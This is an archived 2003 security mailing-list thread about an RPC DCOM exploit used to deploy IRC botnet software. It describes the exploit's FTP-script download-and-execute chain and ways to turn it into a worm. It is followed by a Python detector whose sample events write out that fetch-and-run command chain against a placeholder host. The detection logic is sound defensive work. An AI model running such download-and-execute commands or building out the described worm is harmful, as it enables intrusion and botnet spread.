From: alf1num3rik at yahoo.com (Stephen)
Subject: Re: DCOM Worm/scanner/autorooter !!!

I confirm what Joey said: the actual version does not
replicate itself, but it's very, very easy for a
malicious lamer to add options and commands to make a
harder worm.

Indeed, the new version of the IRC "worm" uses the
universal offsets
(http://www.k-otik.com/exploits/08.07.oc192-dcom.c.php),
which makes it more dangerous, I think!

Regards.

Stephen - Germany


--- Joey <joey2cool@...oo.com> wrote:
> I looked at the code and it is NOT a worm.
> It can be deployed on several computers very fast, but
> it doesn't have the ability to replicate itself from
> the target computer.
> 
> Basically, this exploit sends a command to create a
> script for ftp.exe, which it calls by using
> "ftp -s scriptfile". The script contains the hostname,
> username, password, and file to download. Then it runs
> the file after it's done downloading.
> 
> This can easily be modified to run multiple commands.
> You can set it to download a self-extracting rar/zip
> file and then run a batch file contained inside the
> SFX file after it's done extracting.
> 
> There is a very fine line between proof of concept
> code and worms. Worms are highly illegal and if you
> publish the code you can be held responsible, so make
> sure you are aware of this when posting here. This
> exploit is NOT a worm but the potential for it to be
> a worm is there...
> 
> --- roman.kunz@...iusbaer.com wrote:
> > hi folks,
> > 
> > already saw a re-edited one which has only two
> > targets (just as the last sploit by k-otik).
> > 
> > <cut>
> > /* RPC DCOM WORM v 2.3  - 
> >  * originally by volkam, fixed and beefed by uv/graff
> >  * even more original concept by LSD-pl.net
> >  * original code by HDM 
> >  *
> >  * --
> >  * This code is in relation to a specific DDOS IRCD botnet project.
> >  * You may edit the code, and define which ftp to login
> >  * and which .exeutable file to recieve and run.
> >  * I use spybot, very convienent
> >  * -
> >  * So basicly script kids and brazilian children, this is useless to you
> >  * 
> >  * -
> >  * shouts: darksyn - true homie , giver of 0d4yz, and testbeds
> >  *         volkam  - top sekret agent man 
> >  *         ntfx    - master pupil 
> >  *         jpahk   - true homie #2
> >  *         k3r0m   - made that shit universal (2 targets WinXP - Win2k)
> >  *
> >  * Legion2000 Security Research (c) 2003 
> >  * - 
> >  *  enjoy! 
> > 
> > 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
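
The chain described in the quoted message (a script written for ftp.exe, ftp run with that script, then the downloaded file executed) is visible in process-creation logging. The following detection logic is an added example, not part of the original thread: the record layout, host names, file names and server name are constructed, and it assumes the `-s:filename` form of the Windows ftp client's script option.

```python
import re

# Constructed process-creation records: (host, image, command line).
# Host names, file names and the FTP server are placeholders.
EVENTS = [
    ("ws01", "cmd.exe", "cmd /c echo open ftp.example.invalid> o"),
    ("ws01", "cmd.exe", "cmd /c echo get payload.exe>> o"),
    ("ws01", "ftp.exe", "ftp -s:o"),
    ("ws01", "payload.exe", "payload.exe"),
    ("ws02", "ftp.exe", "ftp ftp.example.invalid"),              # interactive
    ("ws03", "ftp.exe", "ftp.exe -n -s:C:\\jobs\\nightly.txt"),  # pre-existing script
]

ECHO_TO_FILE = re.compile(r"echo\s+(?P<text>.*?)\s*>{1,2}\s*(?P<file>\S+)", re.I)
FTP_SCRIPT = re.compile(r'(?:^|\s)-s:(?P<file>"[^"]+"|\S+)')
GET_CMD = re.compile(r"^(?:m?get|recv)\s+(?P<name>\S+)", re.I)

def detect(events):
    """Return one finding per ftp.exe launch that was given a script file."""
    echoed = {}      # (host, script) -> lines written into it with echo
    findings = []
    for host, image, cmdline in events:
        name = image.lower()
        echo = ECHO_TO_FILE.search(cmdline)
        script = FTP_SCRIPT.search(cmdline)
        if name == "cmd.exe" and echo:
            echoed.setdefault((host, echo["file"].lower()), []).append(echo["text"])
        elif name == "ftp.exe" and script:
            path = script["file"].strip('"').lower()
            lines = echoed.get((host, path), [])
            gets = sorted({g["name"].lower() for g in map(GET_CMD.match, lines) if g})
            findings.append({"host": host, "script": path, "built_by_echo": bool(lines),
                             "fetched": gets, "executed": []})
        else:
            # A later process whose image matches a fetched file completes the chain.
            for f in findings:
                if f["host"] == host and name in f["fetched"]:
                    f["executed"].append(name)
    return findings

def severity(f):
    if f["built_by_echo"] and f["executed"]:
        return "high"      # script written, run, and download executed
    return "medium" if f["built_by_echo"] else "review"

if __name__ == "__main__":
    for f in detect(EVENTS):
        print(severity(f), f)
```

Scripted ftp.exe runs that use a file not written by echo (ws03 here) are left at "review", since scheduled transfer jobs produce the same command line.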

